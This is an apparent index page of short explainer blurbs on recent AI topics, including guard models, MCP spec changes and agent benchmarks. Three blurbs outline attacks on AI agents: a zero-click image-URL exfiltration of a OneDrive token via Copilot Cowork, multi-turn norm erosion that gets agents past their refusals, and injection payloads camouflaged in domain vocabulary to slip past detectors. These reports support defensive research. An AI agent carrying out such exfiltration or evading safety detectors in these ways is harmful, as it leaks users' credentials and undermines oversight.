AI Explained
Plain explanations of trending AI concepts, with live visualizations.
AgentDoG 1.5 — Small inline guard models for agent actions — What does it mean?
A tiny 0.8–8B model that screens every agent action inline — reportedly matching a closed safety model's catch rate at ~100× less deploy overhead.
Anthropic's Project Glasswing — Detection-saturated vulnerability pipeline — What does it mean?
Glasswing partners found 10,000+ high- or critical-severity vulnerabilities in one month. The detection-saturated dynamic is sharpest where the patcher is a separate org — Anthropic's OSS disclosures: 530 reported, only 75 patched after a month.
PromptArmor × Copilot Cowork — Image-URL exfiltration in agent UIs — What does it mean?
PromptArmor showed Microsoft Copilot Cowork posting a Teams message whose hidden <img src> leaks a pre-authenticated OneDrive token the moment the user opens the inbox — zero clicks on a malicious link.
PushBench paper — Quantitative Goal Persistence (QGP) — What does it mean?
PushBench measures Quantitative Goal Persistence — frontier models hold up at 50 artifacts but drop to 3/9 successes at 100; a state-tracking controller restores 69–78% by rejecting duplicate submissions.
OpenSCAD Pantheon benchmark — Human-in-the-loop vs autonomous coding agents — What does it mean?
ModelRift pitted 6 agentic coding tools against the same OpenSCAD Pantheon task — Antigravity 2.0 in autonomous mode won at 4.5/5 in ~12 min while ModelRift's human-in-the-loop tier hit 3.8/5 in ~10 min.
MCP 2026-07-28 RC — stateless transport — What does it mean?
MCP's 2026-07-28 RC reworks transport so every tools/call request carries its own routing data — any server in the fleet can serve it, no sticky session pin required.
Maestro paper — RL orchestrator over frozen experts — What does it mean?
Maestro trains a 4B RL policy that picks (expert, skill) per task from a frozen model pool — 70.1% across 10 multimodal benchmarks, beating GPT-5 (69.3%), and routes to new experts without retraining.
Boiling the Frog paper — Multi-turn norm erosion vs single-prompt agent safety — What does it mean?
Boiling the Frog walks agents from benign edits to risk-bearing actions across multiple turns — averaging 44.4% attack success on 9 frontier agents that would refuse the same final message asked alone.
Camouflage Injection paper — Camouflage Detection Gap — What does it mean?
Injection payloads rewritten in a document's own domain vocabulary slip past current detectors: Llama 3.1 8B drops from 93.8% to 9.7% caught, Llama Guard 3 catches zero.
OpenComputer paper — Verifier-grounded benchmark synthesis — What does it mean?
OpenComputer builds 1,000 computer-use tasks across 33 desktop apps by writing the executable verifier first, calibrating it, then synthesizing tasks that ground into the verifier endpoints — GPT-5.4 hits 68.3% while open-source agents collapse to as low as 5.7%.
MCP SEP-2106 — Full JSON Schema 2020-12 in tool I/O — What does it mean?
MCP SEP-2106 opens tool inputSchema and outputSchema to the full JSON Schema 2020-12 vocabulary — composition, conditionals, refs — and widens structuredContent from object-only to any value.
EnvFactory paper — Synthetic envs for tool-use agent training — What does it mean?
EnvFactory autonomously synthesizes 85 stateful tool environments — 5x fewer than EnvScaler / AWM — and uses topology-aware trajectory sampling to lift Qwen3 tool-use by up to 15 percentage points on BFCL v3.